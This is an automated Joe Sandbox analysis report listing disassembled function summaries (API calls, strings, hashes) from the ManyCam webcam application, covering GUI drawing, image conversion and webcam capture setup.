Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$AllocatorDebugHeap$CreateDirectoryFrames@$Frame@Load@$Delay@DestroyDestroy@FileFolderFrameHeight@MpunctOperationPathRetreiveSpecialWidth@_wmkdirwcscpy_s
String ID: .mce$352x288$640x480$InternalProperties$NewEffect$\ManyCam$blocked=0type_id=%dcategory_name=%screator_info=preview=%s$preview.jpg$preview.jpg
API String ID: 2719232945-3254136489
Opcode ID: edb56aa18bfe84e8b2a6fcb1c4672e86fafff6400bd075d5d8bb305b2034b014
Instruction ID: 9b3459efdfe137e0bd21340dd663e66a4f958181f4942486322fc66185ab85f6
Opcode Fuzzy Hash: edb56aa18bfe84e8b2a6fcb1c4672e86fafff6400bd075d5d8bb305b2034b014
Instruction Fuzzy Hash: D43219B19002599BDB24EB65CC95BEEBBB8BF44304F0041EDE509A7282DB746F84CF95

Function 00409060 Relevance: 54.7, APIs: 22, Strings: 9, Instructions: 435COMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

Part of subcall function 00418B80: CreateSolidBrush.GDI32(7EC02BB4), ref: 00418B8B

FillRect.USER32(00000000,?,00000000), ref: 0040910F
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000), ref: 00409152
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040917C
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409191
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091BC
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091DB
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409212
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409231
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040924D
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409269
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000), ref: 00409287
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000), ref: 004092A3
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000006,00000000,000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006), ref: 004092C4
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,005952B0,00000000,00000000,00000000,?,00000006,00000000,000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8), ref: 004092E7
memset.MSVCR80 ref: 00409647
SelectObject.GDI32(00000000,00000000), ref: 00409676
SetTextColor.GDI32(00000000,00945121), ref: 0040968D

Part of subcall function 00415F90: CopyRect.USER32(?,004093A8), ref: 00415F9F

DrawTextW.USER32(00000000,00000000,00000000,00000018,00000020), ref: 004096E4
SelectObject.GDI32(00000000,?), ref: 004096F9
GetWindowRect.USER32(00000000,?), ref: 0040971D
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,000000FF,000000FF,00000000,00000000,?), ref: 0040974D
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,000000FF,000000FF,00000000,00000000,?), ref: 00409770

Strings

k, xrefs: 0040950E
Name:, xrefs: 004094A0
Select Resource File:, xrefs: 00409464
Type:, xrefs: 00409478
Created by:, xrefs: 004094B4
Category:, xrefs: 0040948C
Tahoma, xrefs: 0040960B
], xrefs: 004094FA
,, xrefs: 004094E6

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$C__@@Draw@Utag$T@@_$Width@$Rect$Height@$ObjectSelectText$BrushClientColorCopyCreateDrawFillSolidU3@_Windowmemset
String ID: ,$Category:$Created by:$Name:$Select Resource File:$Tahoma$Type:$]$k
API String ID: 333958392-4118964679
Opcode ID: 57c0907e371b0e5315c579a3b0ab3a5d9bb1bc661649efe18dc397683e395b28
Instruction ID: c7ad2873c58e454c86f9403bdf801017c004aeaca137986ed775093af6690a25
Opcode Fuzzy Hash: 57c0907e371b0e5315c579a3b0ab3a5d9bb1bc661649efe18dc397683e395b28
Instruction Fuzzy Hash: 1712F970900258DFEB24EB64CC59BEEBB74AF55308F1081E9E10A7B291DB746E88CF55

Function 00B94590 Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 311COMMON

Download Yara Rule

APIs

cvGetMat.CXCORE099 ref: 00B945B5
cvGetErrStatus.CXCORE099(?,00000000,00000000,?), ref: 00B945BF
cvError.CXCORE099(000000FF,cvConvertImage,Inner function failed.,.\utils.cpp,00000203,?,00000000,00000000,?), ref: 00B945DE
cvReleaseMat.CXCORE099(?,?,?,?,?,?,?,00000000,00000000,?), ref: 00B945EB
cvGetMat.CXCORE099(?,?,00000000,00000000,?,?,00000000,00000000,?), ref: 00B94607
cvGetErrStatus.CXCORE099(?,?,?,?,?,00000000,00000000,?), ref: 00B94615
cvError.CXCORE099(000000FF,cvConvertImage,Inner function failed.,.\utils.cpp,00000204,?,?,?,?,?,00000000,00000000,?), ref: 00B94634
cvReleaseMat.CXCORE099(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00B94642

Strings

Destination image must have 1 or 3 channels, xrefs: 00B946F6
Unsupported combination of input/output formats, xrefs: 00B948ED
cvConvertImage, xrefs: 00B945D7, 00B9462D, 00B9467B, 00B946B4, 00B946FB, 00B948BA, 00B948F2
.\utils.cpp, xrefs: 00B945CD, 00B94623, 00B94671, 00B946AA, 00B946F1, 00B948B0, 00B948E8
Destination image must be 8u, xrefs: 00B946AF
Inner function failed., xrefs: 00B945D2, 00B94628, 00B948B5
Source image must have 1, 3 or 4 channels, xrefs: 00B94676

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorReleaseStatus
String ID: .\utils.cpp$Destination image must be 8u$Destination image must have 1 or 3 channels$Inner function failed.$Source image must have 1, 3 or 4 channels$Unsupported combination of input/output formats$cvConvertImage
API String ID: 93656100-3009054405
Opcode ID: aad8cc51cff400f9955dbe7b68b98d18bcdd03bf389c92e3bfcf7a21960c00b1
Instruction ID: 34ccedb727d2df4ceaad5087f5b3c1e47e37a5d291dd9dafcbb2a3891cbd223e
Opcode Fuzzy Hash: aad8cc51cff400f9955dbe7b68b98d18bcdd03bf389c92e3bfcf7a21960c00b1
Instruction Fuzzy Hash: EF9126B2A403006BDA10EF58DC82F2BB7D8AB95714F180AA9F45557292F771ED0987A2

Function 00BC5981 Relevance: 48.5, APIs: 14, Strings: 18, Instructions: 455COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BC5A42
sprintf.MSVCR80 ref: 00BC5AC1
sprintf.MSVCR80 ref: 00BC5B99
sprintf.MSVCR80 ref: 00BC5BB6

Strings

PhotometricInterpretation, xrefs: 00BC5A37, 00BC5B8E, 00BC5D33
Sorry, can not handle image, xrefs: 00BC5E65, 00BC5EA8
Sorry, can not handle LogLuv images with %s=%d, xrefs: 00BC5DA6
Sorry, LogLuv data must have %s=%d or %d, xrefs: 00BC5D74
Sorry, can not handle image with %s=%d, xrefs: 00BC5D38
Sorry, can not handle RGB image with %s=%d, xrefs: 00BC5C48
Out of memory for colormap copy, xrefs: 00BC5BB0
Missing required "Colormap" tag, xrefs: 00BC5ABB
InkSet, xrefs: 00BC5C88
Sorry, can not handle YCbCr images with %s=%d, xrefs: 00BC5BE2
Missing needed %s tag, xrefs: 00BC5A3C
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d, xrefs: 00BC5B93
Color channels, xrefs: 00BC5C43
Planarconfiguration, xrefs: 00BC5BDD, 00BC5DA1
Compression, xrefs: 00BC5CEE, 00BC5D6F
Sorry, LogL data must have %s=%d, xrefs: 00BC5CF3
Samples/pixel, xrefs: 00BC5B88, 00BC5CBE
Sorry, can not handle separated image with %s=%d, xrefs: 00BC5C8D, 00BC5CC3

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: Color channels$Compression$InkSet$Missing needed %s tag$Missing required "Colormap" tag$Out of memory for colormap copy$PhotometricInterpretation$Planarconfiguration$Samples/pixel$Sorry, LogL data must have %s=%d$Sorry, LogLuv data must have %s=%d or %d$Sorry, can not handle LogLuv images with %s=%d$Sorry, can not handle RGB image with %s=%d$Sorry, can not handle YCbCr images with %s=%d$Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d$Sorry, can not handle image$Sorry, can not handle image with %s=%d$Sorry, can not handle separated image with %s=%d
API String ID: 590974362-2918685798
Opcode ID: a8fd80a09a35021c4afb7c8f56e659b39de9e15b5ae8c3f91dfbb29a74a09260
Instruction ID: 98b6e81f2783637e6c860bf6b4ab21b3552f685f34a9d2b8eefca1f282b68a37
Opcode Fuzzy Hash: a8fd80a09a35021c4afb7c8f56e659b39de9e15b5ae8c3f91dfbb29a74a09260
Instruction Fuzzy Hash: 26D11C716407006BE320BB29DC86EBB73E8EF80710F8445BEF946C6151E779F5868756

Function 00BC5590 Relevance: 43.7, APIs: 12, Strings: 17, Instructions: 217COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BC55AA

Strings

PhotometricInterpretation, xrefs: 00BC5614, 00BC56A5, 00BC57B4
Sorry, can not handle LogLuv images with %s=%d, xrefs: 00BC5820
Sorry, LogLuv data must have %s=%d or %d, xrefs: 00BC57F0
Sorry, can not handle image with %s=%d, xrefs: 00BC57B9
Sorry, can not handle RGB image with %s=%d, xrefs: 00BC5705
InkSet, xrefs: 00BC572F
Sorry, can not handle YCbCr images with %s=%d, xrefs: 00BC56DE
Missing needed %s tag, xrefs: 00BC5619
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d, xrefs: 00BC56AA
Color channels, xrefs: 00BC5700
Planarconfiguration, xrefs: 00BC56D9, 00BC581B
Sorry, requested compression method is not configured, xrefs: 00BC55A4
Compression, xrefs: 00BC578F, 00BC57EB
Sorry, can not handle images with %d-bit samples, xrefs: 00BC583E
Sorry, LogL data must have %s=%d, xrefs: 00BC5794
Samples/pixel, xrefs: 00BC569B, 00BC5761
Sorry, can not handle separated image with %s=%d, xrefs: 00BC5734, 00BC5766

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: Color channels$Compression$InkSet$Missing needed %s tag$PhotometricInterpretation$Planarconfiguration$Samples/pixel$Sorry, LogL data must have %s=%d$Sorry, LogLuv data must have %s=%d or %d$Sorry, can not handle LogLuv images with %s=%d$Sorry, can not handle RGB image with %s=%d$Sorry, can not handle YCbCr images with %s=%d$Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d$Sorry, can not handle image with %s=%d$Sorry, can not handle images with %d-bit samples$Sorry, can not handle separated image with %s=%d$Sorry, requested compression method is not configured
API String ID: 590974362-4190150193
Opcode ID: f04b48f9a5e228cde9a1f842c995e0f321c9195a98665daebe713ef427992624
Instruction ID: 3d48875b639b6e7c5acb261bab011a367af1b2f238ea46e2d4cfc8385d71f68a
Opcode Fuzzy Hash: f04b48f9a5e228cde9a1f842c995e0f321c9195a98665daebe713ef427992624
Instruction Fuzzy Hash: A851D5367087516BD720EB39FC49EA773E8EF80700B4448BAF589D71A0E664AC86C756

Function 004F6BD0 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 165fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,Dynamic), ref: 004F6C39
GetFileSize.KERNEL32(000000FF,00000000), ref: 004F6C72
CloseHandle.KERNEL32(000000FF), ref: 004F6C83

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,Dynamic), ref: 004F6CD4

Strings

The Resource File is corrupted. Please select another., xrefs: 004F6CE3
Dynamic, xrefs: 004F6C05
The file size is larger than the maximum allowed (10 Mb)., xrefs: 004F6C89
The Resource File is corrupted. Please select another., xrefs: 004F6C48
You have selected an image with the dimension larger than 3000x2000., xrefs: 004F6DDB
You have selected a file with the size larger than 3Mb., xrefs: 004F6D24
The Resource File is corrupted. Please select another., xrefs: 004F6D81

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: File$Create$AllocatorCloseDebugHandleHeapSize
String ID: Dynamic$The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$The file size is larger than the maximum allowed (10 Mb).$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
API String ID: 1944681888-4013501048
Opcode ID: db53ed9e86c52f9cf1fd276464b43294e0c4f6e7b9bf3ea5ce6500d8ea47b909
Instruction ID: 602c555bb4c1e2a523d70d8c740280473e2c328c7d9138f782ffa9abfa287272
Opcode Fuzzy Hash: db53ed9e86c52f9cf1fd276464b43294e0c4f6e7b9bf3ea5ce6500d8ea47b909
Instruction Fuzzy Hash: 27613C70A00258ABDB14EF54DC96BEEBB75FB40314F50465AF91AAB2D0CB34AF81DB44

Function 00B914C0 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 157windowCOMMON

Download Yara Rule

APIs

capGetDriverDescriptionA.AVICAP32(?,?,00000050,?,00000050,00000000,?,?,?), ref: 00B91512
capCreateCaptureWindowA.AVICAP32(My Own Capture Window,C0000000,00000000,00000000,00000140,000000F0,00000000,00000000,?,?,00000050,?,00000050,00000000), ref: 00B91537
IsWindow.USER32(00000000), ref: 00B9153F
SendMessageA.USER32(00000000,0000040A,?,00000000), ref: 00B9154E
DestroyWindow.USER32(00000000,?,?,?), ref: 00B91555
memset.MSVCR80 ref: 00B91590
IsWindow.USER32(00000000), ref: 00B91599
SendMessageA.USER32(00000000,0000040E,00000004,?), ref: 00B915A8
MoveWindow.USER32(00000000,00000000,00000000,00000140,000000F0,00000001,?,?,?), ref: 00B915BB
IsWindow.USER32(00000000), ref: 00B915C2
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00B915D5
IsWindow.USER32(00000000), ref: 00B915D8
SendMessageA.USER32(00000000,00000405,00000000,00B91470), ref: 00B915EB
IsWindow.USER32(00000000), ref: 00B915EE
SendMessageA.USER32(00000000,00000441,00000060,?), ref: 00B91601
IsWindow.USER32 ref: 00B9160C
SendMessageA.USER32(00000000,00000440,00000060,?), ref: 00B9161F
IsWindow.USER32(00000000), ref: 00B91622
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00B91632
IsWindow.USER32(00000000), ref: 00B91635
SendMessageA.USER32(00000000,00000434,00000001,00000000), ref: 00B91645

Strings

My Own Capture Window, xrefs: 00B91532

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$MessageSend$CaptureCreateDescriptionDestroyDriverMovememset
String ID: My Own Capture Window
API String ID: 3791414574-3038378883
Opcode ID: 55f2f722ea0dc361d8fcfccc1fae8f2c3d5fcd9dfd1379d76276762de9ab9471
Instruction ID: 0b0abd0cbf95fb945603a6808409046b019c5c27df95758b22f953f6e744bb5e
Opcode Fuzzy Hash: 55f2f722ea0dc361d8fcfccc1fae8f2c3d5fcd9dfd1379d76276762de9ab9471
Instruction Fuzzy Hash: 4041E9307817137BF6209B298C42FAF76DCEF86B40F010465F345AA1C0EBB4E901866E

Function 00420D30 Relevance: 37.7, APIs: 25, Instructions: 218windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000005), ref: 00420DA8
GetSysColor.USER32(0000000D), ref: 00420DB3
GetSysColor.USER32(00000008), ref: 00420DBE
CreateSolidBrush.GDI32(00000000), ref: 00420DDA
SetTextColor.GDI32(?,?), ref: 00420DFD
SetBkColor.GDI32(?,?), ref: 00420E0E
CreateSolidBrush.GDI32(?), ref: 00420E18
FillRect.USER32(?,?,?), ref: 00420E30
DeleteObject.GDI32(?), ref: 00420E3A
SetTextColor.GDI32(?,?), ref: 00420E4D
SetBkColor.GDI32(?,?), ref: 00420E5E
CreateSolidBrush.GDI32(?), ref: 00420E68
FillRect.USER32(?,?,?), ref: 00420E80
DeleteObject.GDI32(?), ref: 00420E8A
DrawFocusRect.USER32(?,?), ref: 00420EA3
GetSysColor.USER32(00000011), ref: 00420EFD
SetTextColor.GDI32(?,00000000), ref: 00420F11
SetBkMode.GDI32(?,00000001), ref: 00420F34
wcslen.MSVCR80 ref: 00420F49
TextOutW.GDI32(?,?,?,-0059D15D,00000000), ref: 00420F72
CreateSolidBrush.GDI32(00000000), ref: 00420F7C
FillRect.USER32(?,?,?), ref: 00420F94
DeleteObject.GDI32(?), ref: 00420F9E
FrameRect.USER32(?,?,?), ref: 00420FB3
DeleteObject.GDI32(?), ref: 00420FBD

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Color$Rect$BrushCreateDeleteObjectSolidText$Fill$DrawFocusFrameModewcslen
String ID:
API String ID: 2925841201-0
Opcode ID: 26bd2938b346416d1ad719aebc76d141ac748537c15b6b170e29b0edcf1e6a47
Instruction ID: 66e9c8a567400198a530f2ea5b8cee96818a293c6e558f9a1399f5342b62ddb8
Opcode Fuzzy Hash: 26bd2938b346416d1ad719aebc76d141ac748537c15b6b170e29b0edcf1e6a47
Instruction Fuzzy Hash: 36A1BAB5A00208DFDB08CFD8D9989AEBBB5FF9C310F108119EA19AB355D734A945DF90

Function 00B968E0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 178COMMON

Download Yara Rule

APIs

cvInitSystem.HIGHGUI099(00000000,00000000), ref: 00B968EC

Part of subcall function 00B96810: LoadIconA.USER32 ref: 00B9685D
Part of subcall function 00B96810: LoadCursorA.USER32(00000000,00007F03), ref: 00B9686D
Part of subcall function 00B96810: GetStockObject.GDI32(00000002), ref: 00B9687F
Part of subcall function 00B96810: RegisterClassA.USER32(?), ref: 00B96890
Part of subcall function 00B96810: GetStockObject.GDI32(00000002), ref: 00B968A1
Part of subcall function 00B96810: RegisterClassA.USER32(?), ref: 00B968B4

cvError.CXCORE099(000000E5,cvNamedWindow,NULL name string,.\window_w32.cpp,00000173), ref: 00B96912

Strings

.\window_w32.cpp, xrefs: 00B96901, 00B969C5, 00B96A1E
Main HighGUI class, xrefs: 00B96969
NULL name string, xrefs: 00B96906
cvNamedWindow, xrefs: 00B9690B, 00B969CF, 00B96A28
Inner function failed., xrefs: 00B96A23
Frame window can not be created, xrefs: 00B969CA
HighGUI class, xrefs: 00B969B1

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ClassLoadObjectRegisterStock$CursorErrorIconInitSystem
String ID: .\window_w32.cpp$Frame window can not be created$HighGUI class$Inner function failed.$Main HighGUI class$NULL name string$cvNamedWindow
API String ID: 574138462-2062437467
Opcode ID: 2c695fd037a8fff041b61a8356e13d7a6ef6778d2bdd1f40fa606d61e0bb7043
Instruction ID: 5c2a826da5cd9efc62a58a9dcd17515045349358f545227455a6d95d2ea02c17
Opcode Fuzzy Hash: 2c695fd037a8fff041b61a8356e13d7a6ef6778d2bdd1f40fa606d61e0bb7043
Instruction Fuzzy Hash: 0B51D6B17443117BDB109F6A9C85F56BBD8EB88B21F1442BBF508A72D1E7B0E8108BD4

Function 0041EA80 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 259windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetSysColorBrush.USER32(0000000F), ref: 0041EAEF
FillRect.USER32(00000000,?,00000000), ref: 0041EB03
LoadIconW.USER32(00000000,00000087), ref: 0041EB51
DrawIconEx.USER32(00000000,0000000A,0000000A,?,00000020,00000020,00000000,00000000,00000003), ref: 0041EB75
DeleteObject.GDI32(?), ref: 0041EB7F
SetBkMode.GDI32(00000000,00000001), ref: 0041EBB2
GetTextColor.GDI32(00000000), ref: 0041EBC1
SetTextColor.GDI32(00000000,00000000), ref: 0041EBD2
memset.MSVCR80 ref: 0041EC7C

Part of subcall function 00417240: CreateFontIndirectW.GDI32(00409661), ref: 0041724B

SelectObject.GDI32(00000000,00000000), ref: 0041ECBC
memset.MSVCR80 ref: 0041ECE8
memset.MSVCR80 ref: 0041ED12
memset.MSVCR80 ref: 0041ED3C
wcslen.MSVCR80 ref: 0041EDE0
